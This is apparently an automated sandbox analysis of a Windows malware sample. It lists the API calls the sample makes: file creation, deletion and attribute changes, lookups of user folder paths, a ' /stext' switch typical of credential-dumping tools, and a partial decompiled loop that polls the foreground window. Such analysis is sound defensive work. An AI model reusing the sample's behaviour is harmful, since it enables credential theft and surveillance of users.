                                                                                  • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                                                                  • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                                                                  • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                                                                  • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                                                                  • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                                                                  • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AF9F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFB2
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFBB
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFC4
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFCD
                                                                                • Sleep.KERNEL32(00000064), ref: 0040AFDD
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AFE6
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AFFA
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B00C
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B019
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B026
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B030
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B043
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B04C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B055
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B066
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B07D
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B08F
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B09C
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B0A9
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B0B3
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0C7
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D0
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D9
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0E2
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B0EB
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B0FF
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B111
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B11E
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B12B
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B135
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B149
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B152
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B15B
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B164
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B196
                                                                                  • Part of subcall function 00412DDF: CreateFileW.KERNELBASE(000177DE,80000000,00000003,00000000,00000003,00000080,00000000,00000000,000177DE,?,00409C9F,00000000), ref: 00412DF9
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1AF
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 0040B1B6
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1C5
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1E1
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 0040B1E8
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1F1
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B20A
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 0040B211
                                                                                • Sleep.KERNELBASE(000001F4), ref: 0040B22A
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415B14), ref: 0040B243
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,0041B310,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B28B
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B29B
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B2AB
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?), ref: 0040B2B8
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000), ref: 0040B2C5
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040B2D2
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2DF
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000069), ref: 0040B300
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B309
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B312
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B31B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B327
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B333
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B33F
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2E9
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B408
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B411
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B41D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B426
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B42F
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B43B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B447
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B450
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B459
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B462
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B46B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B474
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@G@std@@$??1?$basic_string@$D@2@@std@@$G@2@@std@@$V?$basic_string@$Hstd@@$?c_str@?$basic_string@$G@2@@0@V10@0@$??0?$basic_string@$D@2@@0@$D@1@@File$G@1@@V10@V10@@$Delete$SleepV01@@rand$??8std@@CreateModuleNameV01@Y?$basic_string@srandtime
                                                                                • String ID: /stext "
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00413626
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?,WinDir), ref: 0041365D
                                                                                • _wgetenv.MSVCRT ref: 0041366D
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00413678
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00413683
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041368F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413698
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136A1
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136AA
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 004136BE
                                                                                • _wgetenv.MSVCRT ref: 004136CE
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004136D9
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004136E4
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004136F0
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136F9
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413702
                                                                                • _wgetenv.MSVCRT ref: 00413720
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00000000), ref: 0041372B
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000208,0041BCB0), ref: 00413741
                                                                                • GetLongPathNameW.KERNELBASE(00000000), ref: 00413748
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041375A
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415A24,?,00000000), ref: 0041376D
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 00413783
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041378E
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041379A
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137A5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137AE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137B7
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C0
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@G@1@@$??4?$basic_string@G@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@_wgetenv$?c_str@?$basic_string@LongNamePath
                                                                                • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • Sleep.KERNELBASE(00002710), ref: 00405607
                                                                                  • Part of subcall function 00405532: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                                                                  • Part of subcall function 00405532: CreateFileW.KERNELBASE(00000000), ref: 00405569
                                                                                  • Part of subcall function 00405532: GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                                                                  • Part of subcall function 00405532: Sleep.KERNEL32(00002710), ref: 004055A7
                                                                                  • Part of subcall function 00405532: FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055AE
                                                                                  • Part of subcall function 00405532: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405619
                                                                                • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 0040562E
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040563F
                                                                                • CreateDirectoryW.KERNELBASE(00000000), ref: 00405646
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00405651
                                                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 00405658
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00405669
                                                                                • SetFileAttributesW.KERNELBASE(00000000), ref: 00405670
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405681
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 00405690
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040569D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056AA
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004056C5
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004056D0
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056DC
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004056F0
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 004056F7
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405708
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405714
                                                                                  • Part of subcall function 00412DDF: CreateFileW.KERNELBASE(000177DE,80000000,00000003,00000000,00000003,00000080,00000000,00000000,000177DE,?,00409C9F,00000000), ref: 00412DF9
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405729
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040574D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405756
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405733
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                                                                  • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                                                                  • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040575F
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040576F
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405778
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405782
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040579A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004057AA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057BB
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057C4
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 004057D1
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 004057E2
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000006), ref: 004057F1
                                                                                • SetFileAttributesW.KERNEL32(00000000), ref: 004057F8
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$File$??0?$basic_string@$??1?$basic_string@V01@@$?length@?$basic_string@$?data@?$basic_string@AttributesCreateD@1@@V01@$??4?$basic_string@Sleep$??9std@@?empty@?$basic_string@ChangeCloseD@2@@0@DirectoryExistsFindNotificationPathSizeV?$basic_string@Y?$basic_string@
                                                                                • String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 37%
                                                                                			E004059BE(intOrPtr __ecx) {
                                                                                				char _v5;
                                                                                				char _v6;
                                                                                				char _v7;
                                                                                				intOrPtr _v12;
                                                                                				signed int _v16;
                                                                                				char _v28;
                                                                                				char _v44;
                                                                                				char _v60;
                                                                                				char _v76;
                                                                                				void* _v92;
                                                                                				intOrPtr _t41;
                                                                                				struct HWND__* _t42;
                                                                                				int _t43;
                                                                                				CHAR* _t45;
                                                                                				signed int _t48;
                                                                                				char* _t58;
                                                                                				char* _t59;
                                                                                				struct HWND__* _t93;
                                                                                				intOrPtr _t94;
                                                                                				void* _t99;
                                                                                				intOrPtr _t112;
                                                                                
                                                                                				_v12 = __ecx;
                                                                                				while(1) {
                                                                                					_t41 = _v12;
                                                                                					if( *((intOrPtr*)(_t41 + 0x3c)) == 0 &&  *((intOrPtr*)(_t41 + 0x3d)) == 0) {
                                                                                						break;
                                                                                					}
                                                                                					if(( *0x41b990 & 0x00000001) == 0) {
                                                                                						 *0x41b990 =  *0x41b990 | 0x00000001;
                                                                                						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                                                                						E00413E72(E00405BB5);
                                                                                					}
                                                                                					Sleep(0x1f4); // executed
                                                                                					_t42 = GetForegroundWindow(); // executed
